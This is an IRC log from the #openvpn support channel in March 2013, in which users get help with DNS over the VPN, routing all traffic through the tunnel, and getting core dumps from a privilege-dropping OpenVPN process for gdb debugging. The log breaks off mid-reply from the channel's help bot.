[~quassel@198.211.102.196] has quit [Remote host closed the connection] 21:03 -!- nlopez [~quassel@198.211.102.196] has joined #openvpn 21:03 -!- nlopez [~quassel@198.211.102.196] has quit [Remote host closed the connection] 21:04 -!- nlopez [~quassel@198.211.102.196] has joined #openvpn 21:07 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 21:13 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 21:16 -!- riot [~riot@eris.hackerfleet.org] has quit [Read error: Operation timed out] 21:16 -!- riot [~riot@eris.hackerfleet.org] has joined #openvpn 21:49 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 22:16 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 22:33 -!- VisionNL_ [~anonymous@tuig.nikhef.nl] has quit [Ping timeout: 245 seconds] 22:33 -!- VisionNL [~anonymous@tuig.nikhef.nl] has joined #openvpn 22:43 -!- MeanderingCode [~Meanderin@71-213-183-157.albq.qwest.net] has joined #openvpn 22:44 -!- MeanderingCode_ [~Meanderin@71-213-190-2.albq.qwest.net] has quit [Ping timeout: 240 seconds] 22:54 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: This computer has gone to sleep] 23:26 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 23:42 -!- MeanderingCode [~Meanderin@71-213-183-157.albq.qwest.net] has quit [Ping timeout: 240 seconds] 23:44 -!- MeanderingCode [~Meanderin@71-213-183-157.albq.qwest.net] has joined #openvpn --- Day changed Tue Mar 26 2013 00:12 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has quit [Read error: Operation timed out] 00:23 -!- arthurdent [~achnic12@ada.evergreen.edu] has joined #openvpn 00:23 < arthurdent> when doing speedtests on speedtest.net with my vpn enabled, my internet connection appears ridiculously fast 00:24 < arthurdent> is my internet connection actually faster or is it just appearing that way and still bottlenecked to my normal ISP speeds? 00:28 < Aketzu> openvpn can do compression 00:28 < rob0> hmm, it could be that the VPN server queues your packets and makes it appear faster, but obviously you will be limited to what your ISP can do. 00:29 < arthurdent> I figured as much, I'm really not sure how these speed-test websites actually calculate speed. 00:34 < arthurdent> thanks 00:34 -!- arthurdent [~achnic12@ada.evergreen.edu] has left #openvpn ["WeeChat 0.4.0"] 00:34 < rob0> Aketzu, IME the LZO compression is not really very effective. 00:57 -!- brute11k [~brute@89.249.230.134] has quit [Ping timeout: 255 seconds] 00:58 -!- brute11k [~brute@89.249.230.134] has joined #openvpn 01:07 < pekster> rob0: Unless the "speedtest" is the alphabet or a bunch of 0x00 bytes :) 01:25 < Aketzu> GET /speedtest/latency.txt?x=1364278940892 HTTP/1.1 01:25 < Aketzu> GET /speedtest/random350x350.jpg?x=1364278943394&y=1 HTTP/1.1 01:26 < Aketzu> bzip2, random350x350.jpg: 1.085:1, 7.372 bits/byte, 7.85% saved, 245388 in, 226122 out. 01:27 < Aketzu> ok, pretty much incompressible 01:27 < Aketzu> everything happens through single TCP socket so ISP might have some fancy rate limiting in place 01:30 < Aketzu> ha... upload is simple repeating string like "CKOXYDXUHXLSEXEIOQRBPTBMHNVEJURSOYQUQYFOXTXGGXNFAMPYOGJEGVSWQS..." 01:30 < Aketzu> upload.txt: 732.843:1, 0.011 bits/byte, 99.86% saved, 499799 in, 682 out. 01:33 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has joined #openvpn 02:10 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 02:33 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 272 seconds] 02:42 -!- ceda [~fredrik@c83-248-146-227.bredband.comhem.se] has quit [Ping timeout: 264 seconds] 02:42 -!- ceda [~fredrik@c83-248-146-227.bredband.comhem.se] has joined #openvpn 02:48 -!- ceda [~fredrik@c83-248-146-227.bredband.comhem.se] has quit [Ping timeout: 245 seconds] 02:59 -!- ceda [~fredrik@c83-248-146-227.bredband.comhem.se] has joined #openvpn 03:04 -!- ceda [~fredrik@c83-248-146-227.bredband.comhem.se] has quit [Ping timeout: 240 seconds] 03:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 03:19 -!- Guest42485 [~matt@mlpc.wiltshire.ac.uk] has left #openvpn [] 03:19 -!- matt_ [~matt@mlpc.wiltshire.ac.uk] has joined #openvpn 03:20 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 03:20 -!- mode/#openvpn [+o krzee] by ChanServ 03:27 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 03:40 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 03:52 -!- ceda [~fredrik@c83-248-146-227.bredband.comhem.se] has joined #openvpn 03:56 -!- Ah2k_ [Ah2k@114.31.8.194] has joined #openvpn 03:57 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 04:00 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has quit [Ping timeout: 272 seconds] 04:01 -!- Dennis84_ [~dennis@mail.it-moebius.de] has joined #openvpn 04:01 -!- Varazir_ [~mircwars@c-94-255-130-176.cust.bredband2.com] has joined #openvpn 04:01 -!- cyberspace- [20253@ninthfloor.org] has quit [Disconnected by services] 04:01 -!- spacedus1 [~info@dev.gentooexperimental.org] has joined #openvpn 04:01 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 04:01 -!- dropje_ [~yge@ip4da6274e.direct-adsl.nl] has joined #openvpn 04:02 -!- eres [~rs@83.167.228.121] has quit [Ping timeout: 245 seconds] 04:05 -!- edwardly_ [~edwardly@cpe-72-190-113-138.tx.res.rr.com] has joined #openvpn 04:06 -!- Netsplit *.net <-> *.split quits: Sickness\, Masxmasx, edwardly, Rough_, Varazir, spacedust, Dennis84, dropje, scoates 04:06 -!- edwardly_ is now known as edwardly 04:07 -!- Varazir_ is now known as Varazir 04:08 -!- eres [~rs@onyon.net] has joined #openvpn 04:10 -!- Sickness\ [~stront@94.23.10.100] has joined #openvpn 04:10 -!- Masxmasx{AFK} [~IetsVulga@u134.baconseed.org] has joined #openvpn 04:12 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has joined #openvpn 04:13 -!- Netsplit *.net <-> *.split quits: Sickness\, Masxmasx{AFK} 04:14 -!- scoates [~sean@iconoclast.caedmon.net] has joined #openvpn 04:18 -!- Netsplit over, joins: Sickness\, Masxmasx{AFK} 04:27 -!- brute11k [~brute@89.249.230.134] has quit [Ping timeout: 248 seconds] 04:28 -!- pekster [~rewt@openvpn/community/support/pekster] has quit [Ping timeout: 256 seconds] 04:30 -!- p3rror [~mezgani@41.140.18.144] has joined #openvpn 04:30 -!- brute11k [~brute@89.249.230.134] has joined #openvpn 04:52 -!- pekster [~rewt@openvpn/community/support/pekster] has joined #openvpn 04:54 -!- p3rror [~mezgani@41.140.18.144] has quit [Ping timeout: 272 seconds] 05:02 -!- Masxmasx{AFK} is now known as Masxmasx 05:02 -!- Masxmasx [~IetsVulga@u134.baconseed.org] has quit [Changing host] 05:02 -!- Masxmasx [~IetsVulga@unaffiliated/masxmasx] has joined #openvpn 05:03 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 05:05 -!- LEDfan [~quassel@94-226-126-193.access.telenet.be] has joined #openvpn 05:05 -!- p3rror [~mezgani@196.201.78.139] has joined #openvpn 05:11 -!- LEDfan_ [~quassel@94-226-126-193.access.telenet.be] has joined #openvpn 05:13 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Ping timeout: 272 seconds] 05:24 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 256 seconds] 05:25 < LEDfan> Hi. Can someone help me with my openvpn configuration? I want to route everything through the openvpn server. But I can't ping or acces any server. This are my config files: https://46.249.33.111/server.conf (sorry for the ssl error) https://46.249.33.111/client.conf 05:26 -!- mikkel [~mikkel@109.202.158.84] has joined #openvpn 05:38 < LEDfan> Okay. I have changed a few things and I can ping now. But I can't acces all websites. 05:47 -!- p3rror [~mezgani@196.201.78.139] has quit [Quit: Leaving] 05:51 < aoeui> LEDfan: DNS? 05:53 -!- mikkel [~mikkel@109.202.158.84] has quit [Ping timeout: 272 seconds] 06:03 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn 06:05 -!- dazo_afk is now known as dazo 06:08 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 06:09 -!- p3rror [~p3rror@ds-59836.dedicados.laniway.com.br] has joined #openvpn 06:13 -!- kubbing [~kubbing@88.103.118.97] has joined #openvpn 06:17 -!- cpm [~Chip@216.169.175.102] has joined #openvpn 06:17 -!- cpm [~Chip@216.169.175.102] has quit [Changing host] 06:17 -!- cpm [~Chip@pdpc/supporter/active/cpm] has joined #openvpn 06:21 < LEDfan> aoeui: yes it's a dns problem. 06:22 < pppingme> what are you using for dns? 06:24 < LEDfan> 8.8.8.8 06:25 < LEDfan> push "dhcp-option DNS 10.1.0.1" on the server 06:26 < LEDfan> I have tried them both. 06:27 < LEDfan> I can access facebook, g+, etc but smaller sites not. But I can't excute this command: tun-mtu 1400 06:34 -!- mattock is now known as mattock_afk 06:38 < MacGyver> ecrist: So, I just hit that bug from last week again. 06:38 < MacGyver> ecrist: This time I got a coredump. 06:40 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 06:43 <@dazo> MacGyver: do you know how to use gdb? 06:44 < MacGyver> dazo: Yes and no. 06:44 < MacGyver> dazo: I know how to get a backtrace. I don't know how to fix missing symbols and whatnot. 06:44 < pppingme> can you ping 8.8.8.8 ? 06:44 <@dazo> MacGyver: okay .... $ gdb .... and then 'bt' when you get the command line ... 06:44 <@dazo> oh ... 06:44 < pppingme> oh, wait, just read.. 06:45 <@dazo> MacGyver: well, pastebin what you get ... and we'll see what we can get out of it 06:45 < pppingme> LEDfan what happens when you try to access smaller sites? 06:47 < MacGyver> dazo: Probably totally useless, it's just addresses with questionmarks and empty parentheses. 06:48 <@dazo> MacGyver: okay ... then you need to do an openvpn build, with CFLAGS += -g 06:48 <@dazo> MacGyver: what OS/distro are you on? 06:49 -!- cpm [~Chip@pdpc/supporter/active/cpm] has quit [Ping timeout: 248 seconds] 06:51 < MacGyver> dazo: Arch. 06:52 < MacGyver> dazo: Maybe it would help if gdb was able to load shared symbols for linux-gate.so.1, that's the only warning I get. But openvpn is unfortunately built without symbols. 06:52 <@dazo> MacGyver: I believe this should help you in the right direction ... https://wiki.archlinux.org/index.php/Debug_-_Getting_Traces 06:52 <@vpnHelper> Title: Debug - Getting Traces - ArchWiki (at wiki.archlinux.org) 06:52 <@dazo> it would be enough if just openvpn have debug symbols compiled in ... we seldom hunt issues outside openvpn 06:54 < LEDfan> pppingme: I can't acces e.g. mijnip.be/ 06:57 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 07:04 < LEDfan> Sorry for the bad information I need to go now. 07:04 -!- LEDfan [~quassel@94-226-126-193.access.telenet.be] has left #openvpn ["http://quassel-irc.org - Chat comfortably. Anywhere."] 07:04 -!- TypoNe [~itsme@195.197.184.87] has quit [Ping timeout: 246 seconds] 07:05 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 245 seconds] 07:06 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 07:06 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 07:11 -!- kubbing [~kubbing@88.103.118.97] has quit [Remote host closed the connection] 07:15 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Quit: WeeChat 0.4.0] 07:18 -!- bjh4 [~bjh4@12.239.198.1] has joined #openvpn 07:20 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 07:23 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 256 seconds] 07:27 -!- pcdummy_ [~quassel@mx1.page4me.ch] has quit [Remote host closed the connection] 07:28 -!- pcdummy [~quassel@unaffiliated/pcdummy] has joined #openvpn 07:30 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 07:31 -!- Volkswagner [~eric@cpe-24-161-55-139.hvc.res.rr.com] has quit [Quit: Leaving] 07:35 -!- LEDfan [~quassel@94-226-126-193.access.telenet.be] has joined #openvpn 07:35 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 07:35 -!- tcamuso [tcamuso@nat/redhat/x-ejfvuhdkalcluvue] has joined #openvpn 07:36 < LEDfan> I'm back. I think I know the problem. (not sure). I think my server need to acces to much hops to get to the website. So I need to change the mtu. But this tun-mtu 1400 07:36 < LEDfan> command is not found? 07:37 <@ecrist> mtu has nothing to do with hops 07:40 -!- matsh [divine@nanogene.org] has quit [Read error: Connection reset by peer] 07:41 < LEDfan> ecrist: oh yes. I'm a little confused. 07:41 <@ecrist> !goal 07:41 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 07:41 <@ecrist> !logs 07:41 <@ecrist> !configs 07:41 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 07:41 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 07:47 < LEDfan> Goal: I would like to access the internet over my vpn. Server os: Debian (on a VPS), Client os: Arch Linux. Server config: https://46.249.33.111/server.conf Client config: https://46.249.33.111/client.conf Server log: https://46.249.33.111/server.log 07:49 -!- LEDfan [~quassel@94-226-126-193.access.telenet.be] has quit [Read error: Operation timed out] 07:52 -!- LEDfan_ [~quassel@94-226-126-193.access.telenet.be] has quit [Ping timeout: 264 seconds] 07:58 -!- matsh [divine@nanogene.org] has joined #openvpn 07:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 08:00 -!- penk [~dave@static-66-137-171-68.axsne.net] has joined #openvpn 08:14 -!- dropje_ is now known as Dropje 08:25 -!- LEDfan [~quassel@94-226-126-193.access.telenet.be] has joined #openvpn 08:26 -!- hrenovo_ [~hrenovo@li469-37.members.linode.com] has joined #openvpn 08:29 -!- hrenovo_ [~hrenovo@li469-37.members.linode.com] has quit [Client Quit] 08:29 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Ping timeout: 256 seconds] 08:30 -!- jzaw [~jzaw@2001:8b0:7:0:5054:ff:fe8e:3b24] has quit [Ping timeout: 256 seconds] 08:31 -!- jzaw [~jzaw@loki.dzki.co.uk] has joined #openvpn 08:40 < MacGyver> dazo: For most accurate results, I take it I should try to create an identical package with debug symbols compiled? 08:40 <@dazo> MacGyver: yeah 08:41 < MacGyver> *sigh* 08:41 < MacGyver> Ah well, let's start :) 08:42 -!- ade_ [~Ade@koln-5d817311.pool.mediaWays.net] has joined #openvpn 08:44 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 08:46 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 252 seconds] 08:50 -!- kubbing [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has joined #openvpn 08:57 -!- kubbing [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has quit [Ping timeout: 264 seconds] 09:01 -!- mitz [~mitz@khp222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 09:04 -!- penk [~dave@static-66-137-171-68.axsne.net] has left #openvpn ["Linkinus - http://linkinus.com"] 09:06 -!- ade_ [~Ade@koln-5d817311.pool.mediaWays.net] has quit [Quit: Too sexy for his shirt] 09:06 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn 09:07 -!- ade_b [~Ade@koln-5d817311.pool.mediaWays.net] has joined #openvpn 09:07 -!- ade_b [~Ade@koln-5d817311.pool.mediaWays.net] has quit [Changing host] 09:07 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 09:20 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 09:31 -!- APTX_ is now known as APTX 09:32 < MacGyver> dazo: When compiling with debug symbols enabled, can I still compile with optimizations (to more closely mimic the original package), or does that really screw op debugging and should optimizations be limited to -O1 or none at all? 09:33 <@dazo> MacGyver: yeah, that's no problems at all ... the crucial argument is the '-g' in CFLAGS 09:33 <@dazo> and also not running 'strip' on the binary afterwards 09:34 < MacGyver> Yeah, those two are default, but in the arch instructions they also add -O1 to the compiler flags. 09:34 < MacGyver> Whereas -O2 is default, iirc. 09:43 < MacGyver> Okay, built, now it's a matter of waiting for the bug to manifest again. 09:54 < MacGyver> Oh great. 09:55 < MacGyver> Built with debug symbols, but hasn't dumped core even though it was a segfault... 09:55 < MacGyver> The hell... 09:57 <@ecrist> can't get a break, MacGyver 10:08 < MacGyver> I just... don't get it. 10:08 < MacGyver> Coredumps are enabled in ulimit for all users. 10:08 < MacGyver> This morning it dumped just fine. 10:08 < MacGyver> I haven't changed ulimits since then... 10:09 < MacGyver> And #archlinux is helpful as always. 10:10 < MacGyver> I.e. anything a little more advanced than "why should I use arch" barely gets a response. 10:22 < MacGyver> Right, I take that back, this one has peaked the interest of some people. 10:24 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 10:30 -!- raidz_away is now known as raidz 10:35 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Ping timeout: 272 seconds] 10:44 < MacGyver> It appears that when I kill openvpn with ^\, core is dumped just fine, but when killed with kill -segv, it isn't. 10:44 < MacGyver> Anything openvpn-specific this could be? 10:48 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:50 -!- cirdan [~chris@c-69-248-228-142.hsd1.nj.comcast.net] has joined #openvpn 10:51 < cirdan> hey all, i have a dns question. OpenVPN pushes 3 dns servers when I connect, but it seems the first one (my internal) isn't used 10:51 < cirdan> normal domains resolve but my internal ones won't. host -v shows it connecting to the 2nd dns server in the list 10:52 < cirdan> if i do it manually host opennms 10.0.0.2 it works fine. this is on 10.8, and scutil --dns and /etc/resolv.conf both have 10.0.0.2 listed first 11:04 -!- joshie__ is now known as joshie 11:06 -!- Aprogas_ is now known as Aprogas 11:06 < cirdan> oh nslookup shows Got recursion not available from 10.0.0.2, trying next server 11:06 < cirdan> hmm why would it do that 11:07 < cirdan> oh well, looks like allowing recursion for the vpn's subnet fixes it... odd though 11:07 < MacGyver> dazo, ecrist: It seems to be *very specific* to openvpn after dropping privs to user/group nobody, that it won't dump core. 11:07 < MacGyver> Cause when I start sleep with sudo -H -u nobody -g nobody /usr/bin/sleep 100, and then kill it with segv, it does dump. 11:08 < MacGyver> Thoughts on this, while I move my ass to the train? 11:08 <@EugeneKay> --user/--group priv dropping sucks. 11:08 <@EugeneKay> !unpriv 11:08 <@vpnHelper> "unpriv" is see https://community.openvpn.net/openvpn/wiki/UnprivilegedUser for a write-up by EugeneKay on how to run OpenVPN without root/admin permissions. 11:08 <@EugeneKay> Do it that way instead ^ 11:09 < MacGyver> EugeneKay: I know - currently I don't care how much it sucks, it seems that these particular circumstances trigger a bug. 11:09 < MacGyver> EugeneKay: Because nobody *is* allowed to dump core on my system. 11:09 < MacGyver> And I want to know why openvpn isn't doing that. 11:11 <@EugeneKay> Because it's doing priv-dropping, not executing as nobody to begin with 11:12 < MacGyver> And the drop includes dropping dump-privs? 11:12 <@EugeneKay> Yup 11:22 < MacGyver> Any way to prevent that or giving it those rivs back (eg through /proc) without altering code? 11:23 < MacGyver> No, wait. 11:23 < MacGyver> Nevermind, Ill just attach gdb as root... That can still be done, right? 11:24 < MacGyver> At least it exxlains why the process isn't dumping. 11:27 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 11:29 -!- _quadDam1ge is now known as _quadDamage 11:30 -!- skn_ [~skn@a56212.upc-a.chello.nl] has joined #openvpn 11:32 < skn_> Hi all.. a noob here trying to install a server on Ubuntu and use the android client. the client connects but the android traffic doesn't seem to go through the vpn.. Anyting obvious I am doing wrong? 11:39 < pekster> Make sure you can ping from your client to the server (leting you know you have a VPN connection as well as IP connectivity) and then see: 11:39 < pekster> !redirect 11:39 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 11:39 <@vpnHelper> http://ircpimps.org/redirect.png 11:46 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has joined #openvpn 11:47 < Keshl> Just saying, it's working great now. I'm away from home, my IP's my home IP, and everything's happy. Just had to add "redirect-gateway def1" to the client-side config. Frowarding was fine. 11:54 -!- JessD [~jdyer@71-14-120-17.dhcp.gnvl.sc.charter.com] has joined #openvpn 11:54 -!- Rough_ [eMc2@114.31.8.194] has joined #openvpn 11:54 -!- Ah2k_ [Ah2k@114.31.8.194] has quit [Quit: Leaving] 11:57 -!- cirdan [~chris@c-69-248-228-142.hsd1.nj.comcast.net] has left #openvpn [] 12:02 <@dazo> MacGyver: which version are you running? 12:02 <@dazo> MacGyver: if you kill any process with -QUIT or -SEGV ... it is supposed to create a core file 12:02 <@dazo> (unless ulimit is configured otherwise) 12:04 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds] 12:04 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has quit [Quit: Konversation terminated!] 12:07 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 12:26 -!- aoeui [~aoeui@gateway/tor-sasl/aoeui] has quit [Remote host closed the connection] 12:28 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 256 seconds] 12:28 -!- aoeui [~aoeui@gateway/tor-sasl/aoeui] has joined #openvpn 12:37 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 13:00 -!- mitz [~mitz@khp222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 13:03 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 13:03 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 13:40 -!- surrealillusion [~surrealil@206.191.57.58] has joined #openvpn 13:40 < surrealillusion> afternoon all 13:41 < surrealillusion> i was wondering if I could get some suggestions as how to get the vpn_gateway directive to work on an openvpnas server? 13:41 < pekster> !as 13:41 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 13:41 < surrealillusion> ah thanks for the pointer, cheers 13:42 < pekster> Yup. We deal with the open-source GPL OpenVPN project specifically here. 13:42 < surrealillusion> :) I may be back to ask questions for my personal setup at some point 13:51 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 13:55 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:55 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 13:55 -!- mode/#openvpn [+o krzee] by ChanServ 13:58 <@krzee> I'm so lazy that i generated certs 6 hours ahead by accident, just gunna wait it out to connect, lol 14:02 < rob0> lazee 14:08 <@EugeneKay> Smooth 14:12 < MacGyver> dazo: Yes, it's supposed to - but when a process drops privileges (which I have openvpn do), it doesn't matter which ulimits are set - something else (i.e. the flag which can be set by prctl's PR_SET_DUMPABLE is cleared. 14:13 < MacGyver> I can *probably* try to force it to dump anyway by setting /proc/sys/fs/suid_dumpable to 1 or 2. 14:13 < MacGyver> Preferably 2. 14:14 < MacGyver> EugeneKay: Thanks for reminding me of that. 14:14 < MacGyver> That is, the fact that dumping privs are dropped when dropping user / group. 14:15 <@EugeneKay> !EugeneKay 14:15 <@vpnHelper> "EugeneKay" is right because EugeneKay is always right. 14:16 <@krzee> :D 14:17 < hazardous> !krzee 14:18 <@vpnHelper> "krzee" is (#1) krzee says happy 4/20 or (#2) http://www.ircpimps.org/pics/krzee/blunt.jpg or (#3) location: moon base where he smokes moonajuana 14:18 < hazardous> weeeeeed 14:18 <@EugeneKay> Not the moonajuana 14:18 <@krzee> moonbong in hand right now actually 14:18 <@EugeneKay> It is massive 14:18 <@EugeneKay> And fueled by tires 14:18 <@EugeneKay> From the moon 14:19 <@krzee> moontires 14:19 < rob0> tired of the moon 14:24 -!- vaillor [~ahah@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn 14:24 < vaillor> hi guys 14:25 < vaillor> what difference is there between client and tsl-client ? 14:26 <@krzee> !man 14:26 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 14:26 <@krzee> you have 2 entries to read 14:27 < vaillor> --tls-client 14:27 < vaillor> Enable TLS and assume client role during TLS handshake. 14:28 -!- tjz [~tjz@unaffiliated/tjz] has quit [Read error: Connection reset by peer] 14:28 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 14:28 < vaillor> but i don't know what is tls :) 14:29 <@krzee> did you read --client ? 14:30 < vaillor> no 14:31 < vaillor> client = tls-client 14:31 < rob0> also scroll up a bit from --tls-client and see "TLS Mode Options:" 14:31 < vaillor> right? 14:31 < vaillor> --client A helper directive designed to simplify the configuration of OpenVPN's client mode. This directive is equivalent to: 14:31 < vaillor> pull 14:31 < vaillor> tls-client 14:32 < rob0> and --tls-server explains a bit more about --tls-client 14:33 -!- bjh4 [~bjh4@12.239.198.1] has quit [Remote host closed the connection] 14:38 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has joined #openvpn 14:41 -!- djshotglass [~Guest7552@zz209205100107.cipherkey.net] has joined #openvpn 14:42 < djshotglass> is there an easy way for a client to have a cert generated automatticly if they have never connected before? 14:43 < djshotglass> im only using the vpn for a call home type deal in my software 14:43 < djshotglass> so they can access their webui from anywhere 14:44 < djshotglass> iv been using a shared cert but all of their ips change so often 14:44 < djshotglass> even though they are not rebooted or anything 14:45 < djshotglass> and for some insane reason there is always more than 1 on same ip 14:45 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has joined #openvpn 14:46 < pekster> djshotglass: The certificate comes from your CA. The client keypair (the public+private RSA key) can be generated on the client, but you still need to send the cert request to the CA for signing before it will be allowed to connect to a multi-server instance 14:50 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 14:52 < MacGyver> Of course, finally got coredumping set up, now I'm unable to reproduce the bug. 14:53 < MacGyver> *sigh* 14:54 < MacGyver> Ah well, gotta remember to set suid_dumpable over reboots. 14:55 < djshotglass> !static 14:55 <@vpnHelper> "static" is (#1) use --ifconfig-push in a ccd entry for a static ip for the vpn client or (#2) example in net30 (default): ifconfig-push 10.8.0.6 10.8.0.5 example in subnet (see !topology) or tap (see !tunortap): ifconfig-push 10.8.0.5 255.255.255.0 or (#3) also see !ccd and !iporder 14:55 < djshotglass> !ccd 14:55 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects. 14:55 < djshotglass> !iporder 14:55 <@vpnHelper> "iporder" is (#1) OpenVPN's internal client IP address selection algorithm works as follows: 1 -- Use --client-connect script generated file for static IP (first choice). or (#2) Use --client-config-dir file for static IP (next choice) !static for more info or (#3) Use --ifconfig-pool allocation for dynamic IP (last choice) or (#4) if you use --ifconfig-pool-persist see !ipp 14:56 -!- tjz [~tjz@unaffiliated/tjz] has quit [Read error: Connection reset by peer] 14:56 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 14:57 < djshotglass> example of client-connect? 14:59 < pekster> !client-connect 14:59 <@vpnHelper> "client-connect" is --client-connect